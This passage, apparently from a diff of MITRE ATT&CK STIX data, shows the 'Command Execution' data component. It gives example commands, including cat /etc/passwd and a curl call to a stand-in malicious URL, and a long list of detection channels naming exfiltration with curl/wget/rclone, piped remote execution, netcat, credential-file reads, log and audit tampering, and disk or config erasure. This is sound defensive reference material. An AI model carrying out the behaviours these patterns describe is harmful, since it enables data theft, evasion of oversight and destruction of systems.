+                            "channel": "GetInstanceIdentityDocument or IMDSv2 token requests"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "DescribeUsers / ListUsers / GetUser"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Graph API Query"
+                        },
+                        {
+                            "name": "saas:MDM",
+                            "channel": "Device lookup, location query, or remote management operation"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-02-23 19:38:20.657000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0083\", \"old_value\": \"https://attack.mitre.org/data-components/DC0083\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0064",
+                            "external_id": "DC0064"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Command Execution",
+                    "description": "Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples: \n\n- Windows Command Prompt\n    - dir \u2013 Lists directory contents.\n    - net user \u2013 Queries or manipulates user accounts.\n    - tasklist \u2013 Lists running processes.\n- PowerShell\n    - Get-Process \u2013 Retrieves processes running on a system.\n    - Set-ExecutionPolicy \u2013 Changes PowerShell script execution policies.\n    - Invoke-WebRequest \u2013 Downloads remote resources.\n- Linux Shell\n    - ls \u2013 Lists files in a directory.\n    - cat /etc/passwd \u2013 Reads the user accounts file.\n    - curl http://malicious-site.com \u2013 Retrieves content from a malicious URL.\n- Container Environments\n    - docker exec \u2013 Executes a command inside a running container.\n    - kubectl exec \u2013 Runs commands in Kubernetes pods.\n- macOS Terminal\n    - open \u2013 Opens files or URLs.\n    - dscl . -list /Users \u2013 Lists all users on the system.\n    - osascript -e \u2013 Executes AppleScript commands.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "android:logcat",
+                            "channel": "Command 'pm list packages' executed by app sandbox or child proc"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "udev rule reload or trigger command executed"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve of script/interpreter (bash, python, node) with suspicious encoded or non-printable content"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Use of mv or cp to rename files with '.' prefix"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve: Execution of update-ca-certificates or trust anchor modification commands"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "gcore, gdb, strings, hexdump execution"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of auditctl, systemctl stop auditd, or kill -9 auditd"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execution of systemctl with subcommands start, stop, enable, disable"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of GUI-related binaries with suppressed window/display flags"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl -X POST, wget --post-data"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "command line arguments containing lsblk, fdisk, parted"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "exec: Execution of dd, efibootmgr, or flashrom modifying firmware/boot partitions"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl -d, wget --post-data"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "grep/cat/awk on files with password fields"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "git push, curl -X POST"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of gsettings set org.gnome.login-screen disable-user-list true"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execution of setfattr or getfattr commands"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Process execution of update-ca-certificates or openssl with suspicious arguments"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "Execution of chattr to set +i or +a attributes"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl or wget with POST/PUT options"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "curl -T, rclone copy"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve of curl,wget,bash,sh,python with piped or remote content"
+                        },
+                        {
+                            "name": "auditd:EXECVE",
+                            "channel": "execve, kill, ptrace, insmod, rmmod targeting security processes"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "proctitle contains chmod, chown, setfacl, or attr commands with suspicious parameters"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "proctitle contains chmod, chown, chgrp, setfacl, or attr with suspicious parameters (777, 755, +x, -R)"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "process title records containing discovery command sequences and environmental assessment patterns"
+                        },
+                        {
+                            "name": "auditd:PROCTITLE",
+                            "channel": "command-line execution patterns for system discovery utilities (uname, hostname, ifconfig, netstat, lsof, ps, mount)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of realmd, samba-tool, or ldapmodify with user-related arguments"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of script interpreters by systemd timer (ExecStart)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands like systemctl stop <service>, service <service> stop, or kill -9 <pid>"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls to locale, timedatectl, or cat /etc/timezone"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "sleep function usage or loops (nanosleep, usleep) in scripts"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect, execve, write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call including 'nohup' or trailing '&'"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Commands executed within an SSH session where no matching logon/authentication event exists"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod, execve"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: iptables, nft, firewall-cmd modifications"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Invocation of scp, rsync, curl, or sftp"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls modifying local mail filter configuration files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: process_name IN (\"virsh\", \"VBoxManage\", \"qemu-img\") AND command IN (\"list\", \"info\")"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: service stop syslog, systemctl stop rsyslog, kill -9 syslog"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: openssl pkcs12, certutil, keytool"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Process in container namespace executes curl|wget|bash|sh|python|nc with outbound args"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of systemctl or service with enable/start parameters"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of cat, less, grep, journalctl targeting log directories (/var/log/)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of python, perl, or custom binaries invoking compression libraries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, USER_CMD"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "bash/zsh of base64, tar, gzip, or openssl immediately after file write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Processes executing sendmail/postfix with forged headers"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of tar, gzip, bzip2, xz, zip, or openssl with compression/encryption arguments"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "promiscuous mode transitions (ioctl or ifconfig)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chattr, rm, shred, dd run on recovery directories or partitions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of curl or wget writing files to /tmp/* followed by chmod or execution"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of downgraded interpreters such as python2 or forced fallback commands"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Command line arguments including SPApplicationsDataType"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of spoofing tools (e.g., hping3, nping, scapy) sending UDP packets to known amplifier ports"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of tools like cat, grep, or awk on credential files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of curl, rsync, wget with internal knowledge base or IPs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of systemctl, loginctl, or systemd-inhibit commands related to sleep/hibernate"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of xev, xdotool, or input activity emulators"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of interpreters creating archive-like outputs without calling tar/gzip"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Execution of insmod, modprobe, or rmmod commands by non-standard users or outside expected timeframes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve syscalls for discovery commands (uname, hostname, id, whoami, ps, netstat, mount) with command-line parameter analysis"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of curl, wget, or custom scripts accessing financial endpoints"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of tar, gzip, bzip2, or openssl with output redirection"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve=/sbin/shutdown or /sbin/reboot"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls modifying HISTFILE or HISTCONTROL via unset/export"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve calls to /usr/bin/locale or shell execution of $LANG"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of systemctl or service with enable/start/modify"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of lsmod, modinfo, or cat /proc/modules"
+                        },
+                        {
+                            "name": "auditd:USER_CMD",
+                            "channel": "USER_CMD"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "InvokeFunction"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "eventName: RunInstances, CreateUser, PutRolePolicy, InvokeCommand"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "SSM RunCommand"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "GetLogEvents: High frequency log exports from CloudWatch or equivalent services"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "command-line execution invoking credential enumeration"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ssm:GetCommandInvocation"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "SendCommand, StartSession, ExecuteCommand: Unexpected AWS Systems Manager command execution targeting EC2 instances"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "Intune PowerShell Scripts"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "OperationName=SetDomainAuthentication OR Update-MsolFederatedDomain"
+                        },
+                        {
+                            "name": "Command",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "docker:api",
+                            "channel": "docker logs access or container inspect commands from non-administrative users"
+                        },
+                        {
+                            "name": "docker:daemon",
+                            "channel": "docker exec or docker run with unexpected command/entrypoint"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "container exec rm|container stop --force"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "useradd or /etc/passwd modified inside container"
+                        },
+                        {
+                            "name": "EDR:AMSI",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "EDR:cli",
+                            "channel": "Command Line Telemetry"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "command execution"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "/var/log/hostd.log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "modification of config files or shell command execution"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "shell access or job registration"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "logline inspection"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "esxcli network firewall set commands"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "event stream"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "scp/ssh used to move file across hosts"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "esxcli system syslog config set or reload"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "command log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Execution of '/bin/vmx' or modifications to '/etc/rc.local.d/local.sh'"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Command Execution"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "remote CLI + vim-cmd logging"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "execution + payload hints"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli system syslog config set/reload, services.sh restart/stop"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "snapshot create/copy, esxcli"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "interactive shell"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "invoked remote scripts (esxcli)"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "base64 or gzip use within shell session"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "scripts or binaries with misleading names"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log entries containing \"esxcli system clock get\""
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "command IN (\"esxcli vm process list\", \"vim-cmd vmsvc/getallvms\")"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "openssl|tar|dd"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Execution of cat, tail, grep targeting /var/log/vmkernel.log or /var/log/hostd.log"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "CLI usage logs"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Command execution trace"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "shell command execution for chmod, chown, or file permission modification on VMFS or system files"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli system syslog config set --loghost='' or stopping hostd service"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "Shell Access/Command Execution"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli software vib list"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/root/.ash_history"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "mv, rename, or chmod commands moving VM files into hidden directories"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "`esxcli software vib install` with `--force` or `--no-sig-check` from shell history or `shell.log`"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "CLI session activity"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "esxcli system shutdown or reboot invoked"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "shell command execution for system discovery (vim-cmd, esxcli, vmware-cmd) targeting VM inventory and host configuration"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "unset HISTFILE or HISTFILESIZE modifications"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "boot logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "/var/log/vmkernel.log"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "DCUI shell start, BusyBox activity"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "esxcli system account add"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Unexpected restarts of management agents or shell access"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "esxcli, vim-cmd invocation"
+                        },
+                        {
+                            "name": "esxi:vobd",
+                            "channel": "shell session start"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "vCenter Management"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file system activity monitor"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "access to BPF devices or interface IOCTLs"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "methodName: setIamPolicy, startInstance, createServiceAccount"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "Shell process (e.g., /bin/sh, /bin/bash) spawned in a container without an interactive session attached (i.e., automation anomaly)"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "process execution involving curl, grep, or awk on secrets"
+                        },
+                        {
+                            "name": "linus:syslog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "command logging"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "Shell history logs"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "Terminal Command History"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "/home/*/.bash_history"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Command-line includes base64 -d or openssl enc -d"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process_events.command_line"
+                        },
+                        {
+                            "name": "linux:shell",
+                            "channel": "Manual invocation of software enumeration commands via interactive shell"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "cron activity"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Suspicious script or command execution targeting browser folders"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unusual outbound transfers from CLI tools like base64, gzip, or netcat"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo chage|grep pam_pwquality|cat /etc/login.defs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo execution of ffmpeg/gst-launch/v4l2-ctl by non-standard user"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sshd logs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "CLI access to 'show running-config', 'show password', or 'cat config.txt'"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Sudo or root escalation followed by filesystem mount commands"
+                        },
+                        {
+                            "name": "linuxsyslog",
+                            "channel": "nslcd or winbind logs"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "Activity Log: Command Invocation"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Cmdlet: Get-GlobalAddressList, Get-Recipient"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Get-RoleGroup, Get-DistributionGroup"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "Inbound email triggers execution of mailbox-stored custom form"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "Inbound email matches crafted rule trigger pattern tied to persistence logic"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "Inbound email triggering Outlook to auto-access folder tied to malicious Home Page"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "Startup execution includes non-default component"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "Execution of unsigned macro from template"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Automated forwarding or file sync initiated by a logic app"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Search-Mailbox, Get-MessageTrace, eDiscovery requests"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-Mailbox, New-InboxRule"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-Mailbox, Set-MailboxPolicy, Set-TrustedLocation"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Interpreter exec with suspicious arguments as above"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd + process_events"
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "system.log"
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "/var/log/system.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dsconfigad or dscl with create or append options for AD-bound users"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl unload, kill, or pkill commands affecting daemons or background services"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of security-agent detection or enumeration commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of chflags hidden or SetFile -a V"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "defaults read -g AppleLocale, systemsetup -gettimezone"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "profiles install -type=configuration"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'eventMessage contains \"loginwindow\" or \"pfctl\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec or sudo usage with NOPASSWD context or echo modifying sudoers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of /usr/bin/security add-trusted-cert or keychain modifications to System.keychain"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "nohup, disown, or osascript execution patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of 'profiles install -type=configuration'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem:com.apple.Terminal"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "base64 or curl processes chained within short execution window"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Invocation of /usr/bin/defaults write or /usr/bin/plutil modifying plist keys"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "chmod command with arguments including '+s', 'u+s', or numeric values 4000\u20136777"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "command includes dscl . delete or sysadminctl --deleteUser"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DS daemon log entries"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "diskutil eraseDisk / asr restore with destructive flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "pfctl -d, socketfilterfw --setglobalstate off, or modifications to com.apple.alf"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "pwpolicy|PasswordPolicy"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Command line contains smbutil view //, mount_smbfs //"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log messages related to disk enumeration context or Terminal session"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "defaults write com.apple.system.logging or logd manipulation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process calling security find-certificate, export, or import"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of log show, fs_usage, or cat targeting system.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of launchctl load/unload/start commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "base64 -d or osascript invoked on staged file"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "diskutil partitionDisk or eraseVolume with partition scheme modifications"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "grep/cat on files matching credential patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "diskutil eraseDisk/zeroDisk or asr restore with destructive flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "spctl --master-disable, csrutil disable, or defaults write to disable Gatekeeper"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: at, job runner"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of dscl . create with IsHidden=1"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'processImagePath contains \"zip\" OR \"base64\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "xattr utility execution with -w or -p flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of 'security', 'cat', or 'grep' commands accessing credential storage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl load or boot-time plist registration"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dscl -create"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "kextload execution from Terminal or suspicious paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "xattr -d com.apple.quarantine or similar removal commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Security framework operations including keychain access, cryptographic operations, and certificate validation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of chflags hidden or setfile -a V"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:spawn, process:exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "csrutil disable"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log show --predicate 'process == <utility>'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of launchctl with setenv or bootout targeting TCC.db or AppleScript under Finder context"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "command execution triggered by emond (e.g., shell, curl, python)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Set or unset HIST* variables in shell environment"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "defaults read -g AppleLocale or systemsetup -gettimezone"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl load/unload or plist file modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dscl . -create"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of commands like `ls -l@`, `xattr -l`, or custom tools interacting with resource forks"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of osascript, sh, bash, zsh, installer, open"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "CLI command"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Policy Update"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "ip ssh pubkey-chain"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "erase flash:, erase startup-config, format disk"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "CLI command logs"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "cmd: cmd=show clock detail"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands to load, copy, or replace system images (e.g., 'copy tftp flash', 'boot system')"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands like 'show running-config', 'copy running-config', or 'export config'"
+                        },
+                        {
